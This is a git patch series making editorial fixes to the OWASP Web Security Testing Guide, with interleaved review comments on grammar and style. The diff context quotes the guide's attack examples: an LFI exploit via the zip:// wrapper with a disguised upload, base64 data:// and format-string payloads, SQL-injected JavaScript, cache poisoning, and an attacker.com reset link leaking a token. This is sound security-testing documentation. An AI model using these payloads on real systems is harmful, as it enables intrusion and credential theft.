@@ -85,22 +85,22 @@ The wrapper can be used like `php://filter/convert.base64-encode/resource=FILE` In PHP 7.2.0, the `zip://` wrapper was introduced to manipulate `zip` compressed files. This wrapper expects the following parameter structure: `zip:///filename_path#internal_filename`. The `filename_path` is the path to the malicious zip archive and `internal_filename` is the path of the malicious file placed inside the processed ZIP file. During the exploitation, it's common that the `#` would be encoded with its URL encoded value `%23`. -Abuse of this wrapper could allow an attacker to design a malicious ZIP file that could be uploaded to the server, for example as an avatar image or using any file upload system available on the target website (the `php:zip://` wrapper does not require the zip file to have any specific extension) to be executed by the LFI vulnerability. +Abuse of this wrapper could allow an attacker to design a malicious ZIP file that could be uploaded to the server, for example as an avatar image or using any file upload system available on the target site (the `php:zip://` wrapper does not require the zip file to have any specific extension) to be executed by the LFI vulnerability. In order to test this vulnerability, the following procedure could be followed to attack the previous code example provided. 1. Create the PHP file to be executed, for example with the content `` and save it as `code.php`. 2. Compress it as a new ZIP file called `target.zip`. -3. Rename the `target.zip` file to `target.jpg` to bypass the extension validation and upload it to the target website as your avatar image. +3. Rename the `target.zip` file to `target.jpg` to bypass the extension validation and upload it to the target site as your avatar image. 4. 
Supposing that the `target.jpg` file is stored locally on the server to the `../avatar/target.jpg` path, exploit the vulnerability with the PHP ZIP wrapper by injecting the following payload to the vulnerable URL: `zip://../avatar/target.jpg%23code` (remember that `%23` corresponds to `#`). Since on our sample the `.php` extension is concatenated to our payload, the request to `http://vulnerable_host/preview.php?file=zip://../avatar/target.jpg%23code` will result in the execution of the `code.php` file existing in the malicious ZIP file. ##### PHP Data -Available since PHP 5.2.0, this wrapper expects the following usage: `data://text/plain;base64,BASE64_STR` where `BASE64_STR` is expected to be the Base64 encoded content of the file to be processed. It's important to consider that this wrapper would only be available if the option `allow_url_include` would be enabled. +Available since PHP 5.2.0, this wrapper expects the following usage: `data://text/plain;base64,BASE64_STR` where `BASE64_STR` is expected to be the base64 encoded content of the file to be processed. It's important to consider that this wrapper would only be available if the option `allow_url_include` would be enabled. -In order to test for LFI using this wrapper, the code to be executed should be Base64 encoded. For example, `` would be encoded as: `PD9waHAgcGhwaW5mbygpOyA/Pg==` and the payload would be represented as: `data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==`. +In order to test for LFI using this wrapper, the code to be executed should be base64 encoded. For example, `` would be encoded as: `PD9waHAgcGhwaW5mbygpOyA/Pg==` and the payload would be represented as: `data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==`. ##### PHP Expect From ca633814db4eaba70caf7c94a6504a94f687a757 Mon Sep 17 00:00:00 2001 
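Review bot: the rewritten line in 09.1-Testing_for_File_Inclusion.md still says `the php:zip:// wrapper`, but the paragraph above introduces it as the `zip://` wrapper and the payload below uses `zip://` as well; there is no `php:zip://` scheme, so correct it while the line is being changed. Separately, lowercasing `Base64` to `base64` in prose is questionable: Base64 is the name of the encoding (RFC 4648), and the lowercase form is only right inside the literal `data://text/plain;base64,` URL, which the hunk leaves as is anyway. Keep `Base64` in prose unless the style guide says otherwise.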
From: Manindar Mohan Date: Fri, 30 Jun 2023 15:55:54 +0530 Subject: [PATCH 11/37] mistake fixed 4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection (#591) --- .../10-Testing_for_Command_Injection.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md index afd6456cc1..03f669834c 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/10-Testing_for_Command_Injection.md @@ -36,7 +36,7 @@ Example: ### Example -Consider the case of an application that contains a set of documents that you can browse from the Internet. If you fire up a personal proxy (such as ZAP or Burp Suite), you can obtain a POST HTTP like the following (`http://www.example.com/public/doc`): +Consider the case of an application that contains a set of documents that you can browse from the internet. If you fire up a personal proxy (such as ZAP or Burp Suite), you can obtain a POST HTTP like the following (`http://www.example.com/public/doc`): ```txt POST /public/doc HTTP/1.1 From 796ff397264aeb3d340ce8686ef409ffe0f984d7 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Fri, 30 Jun 2023 15:56:58 +0530 Subject: [PATCH 12/37] mistake fixed 4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection (#591) --- .../12-Testing_for_Format_String_Injection.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
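Review bot: the touched sentence in the Command Injection hunk still reads "you can obtain a POST HTTP like the following", which is ungrammatical; since the line is already being modified for "Internet" to "internet", reword it to "you can capture an HTTP POST request like the following" in the same commit.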
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md index 83c8fab689..588c4ccf2c 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Format_String_Injection.md @@ -82,7 +82,7 @@ Testers can perform a manual test using a web browser or other web API debugging `https://vulnerable_host/userinfo?username=%25s%25s%25s%25n` -If the web site is vulnerable, the browser or tool should receive an error, which may include a timeout or an HTTP return code 500. +If the site is vulnerable, the browser or tool should receive an error, which may include a timeout or an HTTP return code 500. The Java code returns the error From 6f4e77f4a6b84fc9c6a9e58c34bd8ee53ad85170 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Fri, 30 Jun 2023 15:58:24 +0530 Subject: [PATCH 13/37] mistake fixed 4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability (#591) --- .../13-Testing_for_Incubated_Vulnerability.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md index 90a0c49897..7e121082e1 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/13-Testing_for_Incubated_Vulnerability.md 
@@ -22,7 +22,7 @@ This type of asynchronous attack covers a great spectrum of attack vectors, amon - File upload components in a web application, allowing the attacker to upload corrupted media files (JPEG images exploiting `CVE-2004-0200`, PNG images exploiting `CVE-2004-0597`, executable files, site pages with active component, etc.) - Cross-site scripting issues in public forums posts (see [Testing for Stored Cross Site Scripting](02-Testing_for_Stored_Cross_Site_Scripting.md) for additional details). An attacker could potentially store malicious scripts or code in a repository in the backend of the web-application (e.g., a database) so that this script/code gets executed by one of the users (end users, administrators, etc). The archetypical incubated attack is exemplified by using a cross-site scripting vulnerability in a user forum, bulletin board, or blog in order to inject some JavaScript code at the vulnerable page, and will be eventually rendered and executed at the site user's browser --using the trust level of the original (vulnerable) site at the user's browser. - SQL/XPATH Injection allowing the attacker to upload content to a database, which will be later retrieved as part of the active content in a web page. For example, if the attacker can post arbitrary JavaScript in a bulletin board so that it gets executed by users, then he might take control of their browsers (e.g., [XSS-proxy](http://sourceforge.net/projects/xss-proxy)). -- Misconfigured servers allowing installation of Java packages or similar web site components (i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc.) +- Misconfigured servers allowing installation of Java packages or similar site components (i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc.) ## Test Objectives 
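Review bot: in the rewritten bullet, "i.e. Tomcat, or web hosting consoles such as Plesk, CPanel, Helm, etc." lists examples, so the abbreviation should be "e.g." rather than "i.e."; fix it while the line is being edited, and use the product's own capitalization "cPanel".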
@@ -51,7 +51,7 @@ Usually, this set of examples leverages XSS attacks by exploiting a SQL-injectio The tester then has to match the XSS attacks he has devised with the entries that he is allowed to insert. -In a similar fashion as in the previous XSS example, use a web page field vulnerable to SQL injection issues to change a value in the database that would be used by the application as input to be shown at the site without proper filtering (this would be a combination of an SQL injection and a XSS issue). For instance, let's suppose there is a `footer` table at the database with all footers for the web site pages, including a `notice` field with the legal notice that appears at the bottom of each web page. You could use the following query to inject JavaScript code to the `notice` field at the `footer` table in the database. +In a similar fashion as in the previous XSS example, use a web page field vulnerable to SQL injection issues to change a value in the database that would be used by the application as input to be shown at the site without proper filtering (this would be a combination of an SQL injection and a XSS issue). For instance, let's suppose there is a `footer` table at the database with all footers for the site pages, including a `notice` field with the legal notice that appears at the bottom of each web page. You could use the following query to inject JavaScript code to the `notice` field at the `footer` table in the database. ```sql SELECT field1, field2, field3 From 57577bb9f6257a1b382c8c953de08830c9a570a0 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Fri, 30 Jun 2023 16:00:07 +0530 Subject: [PATCH 14/37] Mistake fixed 4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling (#591) --- .../14-Testing_for_HTTP_Splitting_Smuggling.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
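Review bot: "all footers for the site pages" reads awkwardly after the replacement; "for the site's pages" keeps the meaning. The same line also contains "a XSS issue", which should be "an XSS issue", and the preceding context line refers to the tester as "he"; since this paragraph is being edited, both are worth fixing in the same commit.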
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md index cac1f31858..0ba8ac0e9e 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_HTTP_Splitting_Smuggling.md 
@@ -60,7 +60,7 @@ Content-Length: 35 ``` -The web cache will see two different responses, so if the attacker sends, immediately after the first request, a second one asking for `/index.html`, the web cache will match this request with the second response and cache its content, so that all subsequent requests directed to `victim.com/index.html` passing through that web cache will receive the "system down" message. In this way, an attacker would be able to effectively deface the site for all users using that web cache (the whole Internet, if the web cache is a reverse proxy for the web application). +The web cache will see two different responses, so if the attacker sends, immediately after the first request, a second one asking for `/index.html`, the web cache will match this request with the second response and cache its content, so that all subsequent requests directed to `victim.com/index.html` passing through that web cache will receive the "system down" message. In this way, an attacker would be able to effectively deface the site for all users using that web cache (the whole internet, if the web cache is a reverse proxy for the web application). Alternatively, the attacker could pass to those users a JavaScript snippet that mounts a cross site scripting attack, e.g., to steal the cookies. Note that while the vulnerability is in the application, the target here is its users. Therefore, in order to look for this vulnerability, the tester needs to identify all user controlled input that influences one or more headers in the response, and check whether they can successfully inject a CR+LF sequence in it. From 3b2529704a5e485a6943bedf8603a2aaa5f49d1f Mon Sep 17 00:00:00 2001 
From: Manindar Mohan Date: Fri, 30 Jun 2023 16:01:54 +0530 Subject: [PATCH 15/37] Mistake fixed document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection (#591) --- .../16-Testing_for_Host_Header_Injection.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md index f4ddb93132..3abe134bd4 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/16-Testing_for_Host_Header_Injection.md 
@@ -116,7 +116,7 @@ https://www.attacker.com/reset.php?token=12345 In some cases a server may have virtual hosts that are not intended to be externally accessible. This is most common with a [split-horizon](https://en.wikipedia.org/wiki/Split-horizon_DNS) DNS setup (where internal and external DNS servers return different records for the same domain). -For example, an organization may have a single webserver on their internal network, which hosts both their public website (on `www.example.org`) and their internal Intranet (on `intranet.example.org`, but that record only exists on the internal DNS server). Although it would not be possible to browse directly to `intranet.example.org` from outside the network (as the domain would not resolve), it may be possible to access to Intranet by making a request from outside with the following `Host` header: +For example, an organization may have a single webserver on their internal network, which hosts both their public site (on `www.example.org`) and their internal Intranet (on `intranet.example.org`, but that record only exists on the internal DNS server). Although it would not be possible to browse directly to `intranet.example.org` from outside the network (as the domain would not resolve), it may be possible to access to Intranet by making a request from outside with the following `Host` header: ```http Host: intranet.example.org From da5a26bb716faf3182e44087deecb74677765a52 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Fri, 30 Jun 2023 16:03:19 +0530 Subject: [PATCH 16/37] Mistake fixed document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection (#591) --- .../17-Testing_for_Server-side_Template_Injection.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
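Review bot: "it may be possible to access to Intranet" in the rewritten line is ungrammatical and should read "to access the intranet"; with "website" being lowercased to "site" in the same sentence, "Intranet" should also be lowercased in both places, since it is a generic noun here and not a product name.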
diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md index f4e49e31f9..f4e8d94a3c 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md @@ -120,7 +120,7 @@ The tester can also identify what other objects, methods and properties can be e - [James Kettle: Server-Side Template Injection:RCE for the modern webapp (whitepaper)](https://portswigger.net/kb/papers/serversidetemplateinjection.pdf) - [Server-Side Template Injection](https://portswigger.net/blog/server-side-template-injection) - [Exploring SSTI in Flask/Jinja2](https://www.lanmaster53.com/2016/03/exploring-ssti-flask-jinja2/) -- [Server Side Template Injection: from detection to Remote shell](https://www.okiok.com/server-side-template-injection-from-detection-to-remote-shell/) +- [Server-ide Template Injection: from detection to Remote shell](https://www.okiok.com/server-side-template-injection-from-detection-to-remote-shell/) - [Extreme Vulnerable Web Application](https://github.com/s4n7h0/xvwa) -- [Divine Selorm Tsa: Exploiting server side template injection with tplmap](https://owasp.org/www-pdf-archive/Owasp_SSTI_final.pdf) +- [Divine Selorm Tsa: Exploiting server-side template injection with tplmap](https://owasp.org/www-pdf-archive/Owasp_SSTI_final.pdf) - [Exploiting SSTI in Thymeleaf](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/) From 4f972b8e3f53062ff225804a1949f51809bda879 Mon Sep 17 00:00:00 2001 
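Review bot: the first changed reference introduces a typo, "Server-ide Template Injection" (missing "s"), which must read "Server-side Template Injection". Beyond that, both changed entries are titles of external documents (the okiok blog post and the OWASP PDF by Divine Selorm Tsa); link text for a citation should reproduce the source's own title rather than be normalized to the guide's house spelling, so consider leaving both titles as they were.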
From: Manindar Mohan Date: Fri, 30 Jun 2023 16:04:40 +0530 Subject: [PATCH 17/37] Mistake fixed document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery (#591) --- .../18-Testing_for_Server-Side_Request_Forgery.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md index 21047359fd..da872368ea 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server-Side_Request_Forgery.md 
@@ -16,7 +16,7 @@ Web applications often interact with internal or external resources. While you m ## How to Test -When testing for SSRF, you attempt to make the targeted server inadvertently load or save content that could be malicious. The most common test is for local and remote file inclusion. There is also another facet to SSRF: a trust relationship that often arises where the application server is able to interact with other back-end systems that are not directly reachable by users. These back-end systems often have non-routable private IP addresses or are restricted to certain hosts. Since they are protected by the network topology, they often lack more sophisticated controls. These internal systems often contain sensitive data or functionality. +When testing for SSRF, you attempt to make the targeted server inadvertently load or save content that could be malicious. The most common test is for local and remote file inclusion. There is also another facet to SSRF: a trust relationship that often arises where the application server is able to interact with other backend systems that are not directly reachable by users. These backend systems often have non-routable private IP addresses or are restricted to certain hosts. Since they are protected by the network topology, they often lack more sophisticated controls. These internal systems often contain sensitive data or functionality. Consider the following request: 
@@ -94,14 +94,14 @@ For additional payloads and bypass techniques, see the [references](#references) ## Remediation -SSRF is known to be one of the hardest attacks to defeat without the use of allow lists that require specific IPs and URLs to be allowed. For more on SSRF prevention, read the [Server Side Request Forgery Prevention Cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html). +SSRF is known to be one of the hardest attacks to defeat without the use of allow lists that require specific IPs and URLs to be allowed. For more on SSRF prevention, read the [Server-side Request Forgery Prevention Cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html). ## References - [swisskyrepo: SSRF Payloads](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery) - [Reading Internal Files Using SSRF Vulnerability](https://medium.com/@neerajedwards/reading-internal-files-using-ssrf-vulnerability-703c5706eefb) - [Abusing the AWS Metadata Service Using SSRF Vulnerabilities](https://blog.christophetd.fr/abusing-aws-metadata-service-using-ssrf-vulnerabilities/) -- [OWASP Server Side Request Forgery Prevention Cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html) +- [OWASP Server-side Request Forgery Prevention Cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html) - [Portswigger: SSRF](https://portswigger.net/web-security/ssrf) - [Portswigger: Blind SSRF](https://portswigger.net/web-security/ssrf/blind) - [Bugcrowd Webinar: SSRF](https://www.bugcrowd.com/resources/webinars/server-side-request-forgery/) From 407ef1eeb494a46b4b658cafd15c116ac86e047f Mon Sep 17 00:00:00 2001 
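Review bot: the two changed lines rename the linked OWASP cheat sheet to "Server-side Request Forgery Prevention Cheatsheet" in both the Remediation paragraph and the References entry, while the URL slug on the same lines (`Server_Side_Request_Forgery_Prevention_Cheat_Sheet`) shows the target is not spelled that way; link text for an external reference should match the cited document's actual title, so check the cheat sheet's heading and either leave these two occurrences as they were or make them identical to it.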
From: Manindar Mohan Date: Fri, 30 Jun 2023 16:05:59 +0530 Subject: [PATCH 18/37] Mistake fixed 4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment (#591) --- .../19-Testing_for_Mass_Assignment.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md index 4b52c61732..3b11b0ee4d 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Mass_Assignment.md @@ -81,7 +81,7 @@ The user is then created with the `isAdmin` property set to `true`, giving them #### Detect Handlers -In order to determine which part of the application is vulnerable to mass assignment, enumerate all parts of the application that accept content from the user and can potentially be mapped with a model. This includes all HTTP requests (most likely GET, POST, and PUT) that appear to allow create or update operations on the back end. +In order to determine which part of the application is vulnerable to mass assignment, enumerate all parts of the application that accept content from the user and can potentially be mapped with a model. This includes all HTTP requests (most likely GET, POST, and PUT) that appear to allow create or update operations on the backend. One of the most simple indicators for potential mass assignments is the presence of bracket syntax for input parameter names, as for example: ```html From 3c18cf3a48c7b496d566eab271118d914f056114 Mon Sep 17 00:00:00 2001 
From: Manindar Mohan Date: Fri, 30 Jun 2023 16:10:49 +0530 Subject: [PATCH 19/37] Mistake fixed 4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting (#591) --- .../01.1-Testing_for_Reflected_Cross_Site_Scripting.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md index 4b2da3a0c2..0f156a6bb1 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.1-Testing_for_Reflected_Cross_Site_Scripting.md @@ -161,7 +161,7 @@ Now suppose that developers of the target site implemented the following code to Decoupling the above regular expression: 1. Check for a `` for one or more occurrences 4. Check for a `src` @@ -171,7 +171,7 @@ This is useful for filtering expressions like ` ``` -This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim web site, `http://example/`. +This will exploit the reflected cross site scripting vulnerability shown before, executing the JavaScript code stored on the attacker's web server as if it was originating from the victim website, `http://example/`. #### Example 7: HTTP Parameter Pollution (HPP) From d9985e579bc2f4a6ca245a5ffece27f4091f0454 Mon Sep 17 00:00:00 2001 
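Review bot: the second hunk (`@@ -171,7 +171,7 @@`) changes "victim web site" to "victim website", whereas every other commit in this series normalizes to "site"; pick one form here so the line does not have to be rewritten again later in the series, preferably by folding the later correction into this commit.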
From: Manindar Mohan Date: Fri, 30 Jun 2023 16:13:41 +0530 Subject: [PATCH 20/37] Mistake fixed 4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting (#591) --- .../01.2-Testing_for_Stored_Cross_Site_Scripting.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md index 0af255b50c..f0b57b5788 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.2-Testing_for_Stored_Cross_Site_Scripting.md 
@@ -4,7 +4,7 @@ Stored [Cross-site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) is the most dangerous type of Cross Site Scripting. Web applications that allow users to store data are potentially exposed to this type of attack. This chapter illustrates examples of stored cross site scripting injection and related exploitation scenarios. -Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS. +Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the website and run within the user’s browser under the privileges of the web application. Since this vulnerability typically involves at least two requests to the application, this may also called second-order XSS. This vulnerability can be used to conduct a number of browser-based attacks including: 
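Review bot: this hunk changes "web site" to "website" while the rest of the series uses "site"; settle on one spelling before merging. The same line also carries the pre-existing grammar slip "this may also called second-order XSS" (missing "be"), which should be fixed while the sentence is being edited.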
@@ -39,7 +39,7 @@ The process for identifying stored XSS vulnerabilities is similar to the process #### Input Forms -The first step is to identify all points where user input is stored into the back-end and then displayed by the application. Typical examples of stored user input can be found in: +The first step is to identify all points where user input is stored into the backend and then displayed by the application. Typical examples of stored user input can be found in: - User/Profiles page: the application allows the user to edit/change profile details such as first name, last name, nickname, avatar, picture, address, etc. - Shopping cart: the application allows the user to store items into the shopping cart which can then be reviewed later 
@@ -155,12 +155,12 @@ Blind Cross-site Scripting is a form of stored XSS. It generally occurs when the Gray-box testing is similar to black-box testing. In gray-box testing, the pen-tester has partial knowledge of the application. In this case, information regarding user input, input validation controls, and data storage might be known by the pen-tester. -Depending on the information available, it is normally recommended that testers check how user input is processed by the application and then stored into the back-end system. The following steps are recommended: +Depending on the information available, it is normally recommended that testers check how user input is processed by the application and then stored into the backend system. The following steps are recommended: -- Use front-end application and enter input with special/invalid characters +- Use frontend application and enter input with special/invalid characters - Analyze application response(s) - Identify presence of input validation controls -- Access back-end system and check if input is stored and how it is stored +- Access backend system and check if input is stored and how it is stored - Analyze source code and understand how stored input is rendered by the application If source code is available (as in white-box testing), all variables used in input forms should be analyzed. In particular, programming languages such as PHP, ASP, and JSP make use of predefined variables/functions to store input from HTTP GET and POST requests. From 04a6714e75ced13c9db4c835715f73265cb73874 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Fri, 30 Jun 2023 16:38:04 +0530 Subject: [PATCH 21/37] Mistake fixed 4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting (#591) --- .../01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
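Review bot: the two rewritten list items are missing articles: "Use frontend application and enter input" should read "Use the frontend application and enter input", and "Access backend system" should read "Access the backend system"; since both lines are already being changed for the hyphen removal, fix the wording in the same commit.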
diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md index bfeeb5b7bb..fbd45874f9 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01.4-Testing_for_Self_DOM_Based_Cross_Site_Scripting.md @@ -19,7 +19,7 @@ The process of testing for Self DOM-Based cross site scripting follows: This specific example is from this [hackerone ticket](https://hackerone.com/reports/406587). -In the example the following JavaScript function is executed on the website `https://example.com`. +In the example the following JavaScript function is executed on the site `https://example.com`. ```js //Marketo Form Code From cd15fd441c215c72cdc71fdb6d6e2c339aee7830 Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Sat, 1 Jul 2023 07:53:33 +0530 Subject: [PATCH 22/37] links are broken mistake fixed in 4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection (#591) --- .../03-Testing_for_SQL_Injection.md | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md index 26ca0c5afb..c98977662f 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/03-Testing_for_SQL_Injection.md 
@@ -805,14 +805,14 @@ For generic input validation security, refer to the [Input Validation CheatSheet Technology specific Testing Guide pages have been created for the following DBMSs: -- [Oracle](05.1-Testing_for_Oracle.md) -- [MySQL](05.2-Testing_for_MySQL.md) -- [SQL Server](05.3-Testing_for_SQL_Server.md) -- [PostgreSQL](05.4-Testing_PostgreSQL.md) -- [MS Access](05.5-Testing_for_MS_Access.md) -- [NoSQL](05.6-Testing_for_NoSQL_Injection.md) -- [ORM](05.7-Testing_for_ORM_Injection.md) -- [Client-side](05.8-Testing_for_Client-side.md) +- [Oracle](03.1-Testing_for_Oracle.md) +- [MySQL](03.2-Testing_for_MySQL.md) +- [SQL Server](03.3-Testing_for_SQL_Server.md) +- [PostgreSQL](03.4-Testing_PostgreSQL.md) +- [MS Access](03.5-Testing_for_MS_Access.md) +- [NoSQL](03.6-Testing_for_NoSQL_Injection.md) +- [ORM](03.7-Testing_for_ORM_Injection.md) +- [Client-side](03.8-Testing_for_Client-side.md) ### Whitepapers From 9bc3108a85f7e9aa71629623d4edece91cbea45d Mon Sep 17 00:00:00 2001 From: Manindar Mohan Date: Sat, 1 Jul 2023 07:57:37 +0530 Subject: [PATCH 23/37] mistake with code blok surrounded by blank lines fixed (#591) --- .../01-Testing_for_Cross_Site_Scripting.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md index 1e4229772c..bc26715b24 100644 --- a/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md +++ b/document/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_Cross_Site_Scripting.md 
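Review bot: the eight link targets move from `05.x-Testing_for_...` to `03.x-Testing_for_...`, which follows the file rename performed earlier in this series; the link fix belongs in the same commit as the rename so no intermediate commit leaves the guide with broken links, and it is worth grepping the repository for any other `05.x-Testing_for_` references (index or README pages) that the rename would also have broken.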
